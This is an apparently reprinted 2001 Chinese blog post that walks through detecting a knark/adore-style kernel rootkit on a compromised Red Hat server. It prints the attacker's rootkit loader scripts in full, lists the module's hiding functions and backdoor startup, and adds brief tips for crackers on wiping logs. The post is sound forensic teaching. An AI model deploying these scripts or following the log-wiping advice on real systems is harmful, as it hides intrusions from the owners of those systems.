一次入侵检查

  转载:inburst(闯入) 来源:liz 一次入侵检查 by liz(男生!!!)08/18/2001 一. 发现 前两天装了一个Redhat 6.2,因为懒,系统开了ftp和telnet服务之后就没再管过,平时扔在那里做个ftp中转站。 前日,朋友告诉我机器的ftp不能匿名登录了,很是纳闷,登上去nmap一下,发现不对了: [liz]$ nmap 127.0.0.1 PortStateService 21/tcpopenftp23/tcpopentelnet 111/tcp opensunrpc 113/tcp openauth 看看网络情况: [liz]$ netstat -an Active Internet connections (servers and established) Proto Recv-Q Send-Q Local AddressForeign AddressStatetcp00 0.0.0.0:210.0.0.0:*LISTENtcp00 0.0.0.0:230.0.0.0:*LISTENtcp0 138 a:23b:1122ESTABLISHED hoho,竟然没有,难道netstat被替换掉了? 看看RPM校验: [liz]$ rpm -qf /bin/netstat net-tools-1.54-4 [liz]$ rpm -V net-tools 什么都没有,似乎…netstat没有问题,难道加载了llkm? [liz]$ lsmod ModuleSize Used by 空的(系统本身没有加载lkm),module隐藏了? 是不是杞人忧天啊?看看系统有什么改变没有? [liz]$ cat /var/log/message Aug 9 00:05:54 FTP_test PAM_pwdb[889]: (login) session opened for user liz by (uid=0) Aug 9 00:07:34 FTP_test PAM_pwdb[889]: (login) session closed for user liz Aug 9 00:07:34 FTP_test inetd[483]: pid 888: exit status 1 Aug 9 00:39:51 FTP_test inetd[483]: pid 919: exit status 1 Aug 9 04:02:00 FTP_test anacron[979]: Updated timestamp for job `cron.daily’to 2001-08-09 Aug 9 06:28:48 FTP_test inetd[483]: extra conf for service 19/tcp (skipped) Aug 11 11:50:32 FTP_test PAM_pwdb[608]: (login) session opened for user liz by (uid=0) 嘻嘻,发现问题了:怎么大半夜里我的帐号还在用?还有,9号到11号之间竟然没有任何记录?虽然我的机器利用率不高,可crond总还是在跑的吧,连这个都没有,显然显然… 再看看wtmp记录: [liz]$ strings /var/log/wtmp … ftpd748 pts/0 ftpd786 @ftp pd950c097.dip.t-dialin.net ftpd786 pts/0 … ftpd14698 @ftp pd950ef94.dip.t-dialin.net ftpd14698 pts/0 …. ftpd15200 @ftp 211.178.18.15 ftpd15200 挺热闹的嘛,当然了,不足为证。 忘了忘了,最重要的: [liz]$ w USERTTYFROMLOGIN@ IDLE JCPU PCPU WHAT lizpts/0 b10:58am 0.00s 0.11s ?- 只有我一个,也就这个log正常了。 现在可以肯定,系统有人进来了。 比较麻烦,静下心来想一想…… 一个cracker,找到一个redhat 6.2的漏洞,比如说wu-ftp2.6 漏洞,,很顺利的(5555…没面子)拿到root权限,上载一些东东,加载llkm,隐藏相应的进程、目录和llkm,然后留一个后门(姑且是111或/和113端口的了),擦脚印,撤。 恩,典型的攻击方式,很符合系统的记录,可是留下 痕迹1:wtmp里pd950ef94.dip.t-dialin.net两次来我的机子,而且时间相差甚远(看ftpd号),又是拨号用户,也许不是他,可是我现在抓不到人,错抓一个也比一个没有强,算他倒霉了,*_^。 痕迹2:message里擦脚印也不高明点,一股脑删,唉。 痕迹3:好端端的给我机器开几个服务,也不找个高明点的后门,不是明摆着让我去查嘛。 痕迹4,5,6…:待查,呵呵 好了,既然他加载了llkm,rc里势必要留下点什么,要不然机器一重起,llkm没了就完了。 可是rc里那么多,我一个一个查,还不累死啊? 偷个懒,md5一下。 [liz]$ md5sum 慢着…….,现在系统不能相信了,md5sum也不例外,找个干净的cp过来md5。 [liz]$ ftp… …. [liz]$ /usr/bin/md5sum /etc/inittab > /tmp/md5.txt [liz]$ cd /etc/rc.d [liz]$ /usr/bin/md5sum `find `pwd` -type f` >> /tmp/md5.txt 再找个干净的机器造个相同的文件md5.txt1 diff一下: [liz]$ diff /tmp/md5.txt /tmp/md5.txt1 > result.txt 经过详细和漫长(么?)的比较,并去除链接和以K开头的文件,终于发现两个不一样: /etc/rc.d/rc.loacl /etc/rc.d/init.d/syslog 懒得自己去看,还是diff吧,取干净的rc.local和syslog过来 diff的结果: 干净的rc.local忘记注释issue那部分了,无妨无妨 syslog: /dev/null 呵呵,原来是knark啊,顺势看看kload,找到如下文件: /bin/rkup /bin/kload /usr/lib/.rain目录下: .: bot home lkm ssh ./bot: c0r3 emech ./bot/c0r3: c0r3 ls: ./bot/emech: Permission denied ./home: ./lkm: adore.o ava modhide.o src ./lkm/src: adore.c ava.c config libinvisible.c libinvisible.h modhide.c ./ssh: ssh_host_key ssh_random_seed sshd.pid sshd_config sshdchk sshdx 经过仔细的(又来了…)分析,终于弄明白大部分是作什么用的: 入侵的cracker似乎叫r41n,这些东东都是他自己写的rootkit kkit里的,从这几个地方可以看到: (当然或许是个全盘照抄的cracker也不一定) [liz]$ cat /bin/rkup #!/bin/sh # Kkit by r41n (c) 2000 … [liz]$ cat /usr/lib/.rain/home/.bashrc … echo “Welcome r41n! Enjoy Kkit by r41n!” echo -n ” 0wn3d: Thu Aug 9 06:42:38 HKT 2001 ” … 而且可以看到,这个cracker还把系统攻破的时间记下来,跟前边分析的几个log出现问题的时间一致。 从分析的结果看,r41n的这个kkit用的还是knark的思想,又针对一些具体情况做了改动。cracker用的主目录/usr/lib/.rain还是knark风格的,实在没创意。 以下是各个文件作用的分析: /bin/rkup: ———start———— #!/bin/sh # Kkit by r41n (c) 2000 RKPATH=/usr/lib/.rain PATH=… # Loads and hides knark if [ “$1” != “kit” ]; then depmod -a &>/dev/null insmod $RKPATH/lkm/adore.o &>/dev/null T=`lsmod | grep “adore”` if [ ! “$T” ]; then # echo “cant load .. recompile” >/test cd $RKPATH/lkm/src ./config ./compile if [ -e adore.o ]; then cp -f adore.o .. &>/dev/null cp -f modhide.o .. &>/dev/null cp -f ava .. &>/dev/null rm -f *o &>/dev/null rm -f ava &>/dev/null rm -f compile &>/dev/null # echo “ok recompiled… loading!” >>/test else rm -rf /usr/lib/.rain &>/dev/null rm -rf /bin/rkup &>/dev/null rm -rf /bin/kload &>/dev/null echo “#!/bin/sh” >/bin/rkup echo “# r41n was here…” >>/bin/rkup chmod +x /bin/rkup #echo “cant recompile! OUT!” >>/testexit fi insmod $RKPATH/lkm/adore.o &>/dev/null T=`lsmod | grep “adore”` if [ ! “$T” ]; thenrm -rf /usr/lib/.rain &>/dev/null rm -rf /bin/rkup &>/dev/null rm -rf /bin/kload &>/dev/null echo “#!/bin/sh” >/bin/rkup echo “# r41n was here…” >>/bin/rkup chmod +x /bin/rkup #echo “cant load after recompile! OUT!” >>/testexit fi fi # echo “LOADED OK!!!” >>/test insmod $RKPATH/lkm/modhide.o &>/dev/null fi # Hides files ava h $RKPATH &>/dev/null ava h $RKPATH/lkm &>/dev/null ava h $RKPATH/ssh &>/dev/null ava h $RKPATH/home &>/dev/null ava h $RKPATH/bot &>/dev/null ava h /bin/rkup &>/dev/null ava h /bin/kload &>/dev/null /bin/kload &>/dev/null ————end————— 系统启动时自动载入的文件,1.编译并载入adore.o,即knark,并作简单的判断,如果不能正常载入,则删除所有相关文件,撤退(这点还是蛮好的)2.隐藏module adore,3.隐藏相关目录和文件(其实$RKPATH在adore载入以后已经自动隐藏了),3.启动/bin/kload 其中,adore是主要module,它替换系统调用,用以隐藏相关的进程、文件、非授权提升用户权限,这是它的几个函数 : int is_invisible(pid_t pid) //查看process是否已经真的隐藏 int is_secret(struct super_block *sb, struct dirent *d) //查看文件是否已经真的隐藏 int hide_process(pid_t pid) int remove_process(pid_t pid) //从task-struct中移除相关process int unhide_process(pid_t pid) int strip_invisible() //使process不被get_pid_list()发现(从proc里移除process么?我也没弄明白,对这个不熟) int unstrip_invisible() int n_getdents(unsigned int fd, struct dirent *dirp, unsigned int count) //隐藏文件 int n_fork(struct pt_regs regs) //完成递归隐藏文件 int n_clone(struct pt_regs regs) int n_kill(pid_t pid, int sig) //接收signal,和外部的接口 int n_write(unsigned int fd, char *buf, size_t count) //对netstat隐藏相关服务 int n_setuid(uid_t uid) //提升用户权限 ava是adore的外部接口: … printf(“Usage: %s {h,u,r,R,i,v,U} [file, PID or dummy (for U)]\n\n” “h hide file\n” “u unhide file\n” “r execute as root\n” “R remove PID forever\n” “U uninstall adore\n” “i make PID invisible\n” “v make PID visible\n\n”, argv[0]); … 很明显,不用解释了。 modhide完成隐藏adore的工作。 下边是/bin/kload: ————–start——————- #!/bin/sh # Kkit by r41n (c) 2000 PATH=… RKPATH=/usr/lib/.rain # c0r3 load $RKPATH/bot/c0r3/c0r3 # sshd start cd $RKPATH/ssh ./sshdx -q &>/dev/null # psybnc start #cd $RKPATH/proxy/psybnc #./psybncx &>/dev/null # emech start cd $RKPATH/bot/emech ./mechx &>/dev/null #killall -31 mechx &>/dev/null cd / # hide`em #killall -31 sshdx &>/dev/null #killall -31 c0r3 &>/dev/null ———-end——————— 从中可见,cracker起了一个sshd后门(就是这个dameon把前边所说的113端口占用了),并起了一个irc的客户端mechx(干什么?不懂),然后隐藏相应的进程。这些苦于没有源码,只能靠猜测了。 三. 清理(略) 四. 总结 一次典型的llkm攻击。 1. 给我等被害人的: (1) 系统一定要及时打补丁,这次遇上的是一个用llkm的cracker,如果运气不好,遇上一个替换系统函数库的(这个俺也不懂,谁有问题问lg_wu去,*_^),那就惨死了。 (2) 装完系统最好先对关键文件做个备份并做md5sum,以后怀疑出问题时拿这些对照,可以很容易找到入侵点。例如写这么一个简单的shell脚本,完了把那些文件放到安全的地方: ———-start—————– #!/bin/bash echo “###########################################################” echo “## This is only an idea,you can do whatever you want! ##” echo “##by liz##” echo “##08/18/2001##” echo “###########################################################” FILE=/tmp/back/md5.txt cd /tmp rm -rf back mkdir back cd back find / -type f \( -perm -04000 -o -perm -02000 \) -print >& syssuid1 cat syssuid1 | grep -v “find:” > syssuid cp /etc/inetd.conf . cp /etc/services . cp /bin/login . cp /etc/passwd . cp /etc/shadow . strings /bin/login > strlogin #md5 myself /usr/bin/md5sum /usr/bin/md5sum > $FILE /usr/bin/md5sum /usr/bin/find >> $FILE /usr/bin/md5sum /usr/bin/pwd >> $FILE #md5 files when sys init need /usr/bin/md5sum /etc/lilo.conf >> $FILE /usr/bin/md5sum /etc/inittab >> $FILE cd /etc/rc.d /usr/bin/md5sum `find `pwd` -type f` >> $FILE cd – #md5 files which seem important /usr/bin/md5sum /bin/login >> $FILE /usr/bin/md5sum /bin/ps >> $FILE /usr/bin/md5sum /bin/netstat >> $FILE /usr/bin/md5sum /bin/ls >> $FILE /usr/bin/md5sum /bin/su >> $FILE #md5 some conf files /usr/bin/md5sum /etc/resolv.conf >> $FILE /usr/bin/md5sum /etc/passwd >> $FILE /usr/bin/md5sum /etc/services >> $FILE #/usr/bin/md5sum /etc/inetd.conf >> $FILE cd .. tar zcvf back.tar.gz back/ rm -rf back ———-end——————- 将来直接做对照就可以啦(愿意的话你再写个对照的脚本)。 2.给cracker的: (1) 不要随便改对方机器的配置,会很容易被抓到! (2) log一定要清理干净,不要相信那些所谓的工具,还是把工具源码找来自己改合适最好 3.疑问 (1) 在分析cracker程序的过程中发现一个问题: adore.c中: 只看到了系统调用的定义(仅仅是定义而已,没有内容): int (*o_getdents)(unsigned int, struct dirent *, unsigned int); int (*o_kill)(int, int); int (*o_write)(unsigned int, char *, size_t); int (*o_fork)(struct pt_regs); int (*o_clone)(struct pt_regs); int (*o_setuid)(uid_t); int (*o_symlink)(const char *, const char*); 和使用: REPLACE(write); REPLACE(getdents); REPLACE(kill); REPLACE(fork); REPLACE(clone); REPLACE(setuid); 它们具体是怎么实现的,程序里却没有,adore.c也没有自定义的include,难道说…系统函数库已经被替换掉了? (2)cracker为什么要起一个irc?这个好像在很多情况下都存在,是cracker的惯例,还是一种隐秘的通信方式? (3)kload里起的那几个程序 $RKPATH/bot/c0r3/c0r3 ./sshdx -q ./mechx 之间的关系还没有弄明白,似乎不是sshdx是sshd后台进程、mechx是irc客户端那么简单。 发布时间:2001年08月23日13时 细数门前落叶,倾听窗外雨声,

一次入侵检查

相关文章:

你感兴趣的文章:

标签云: